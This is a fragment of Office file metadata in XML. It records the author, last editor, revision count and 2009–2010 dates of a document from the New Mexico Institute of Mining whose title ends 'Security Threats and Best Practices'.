  <Company>New Mexico Institute of Mining &amp;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Security Threats and Best Practices </dc:title>
  <dc:creator>Anand Paturi</dc:creator>
  <cp:lastModifiedBy>ram</cp:lastModifiedBy>
  <cp:revision>253</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-05-04T05:31:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-08-05T15:28:52Z</dcterms:modified>
</cp:coreProperties>
</file>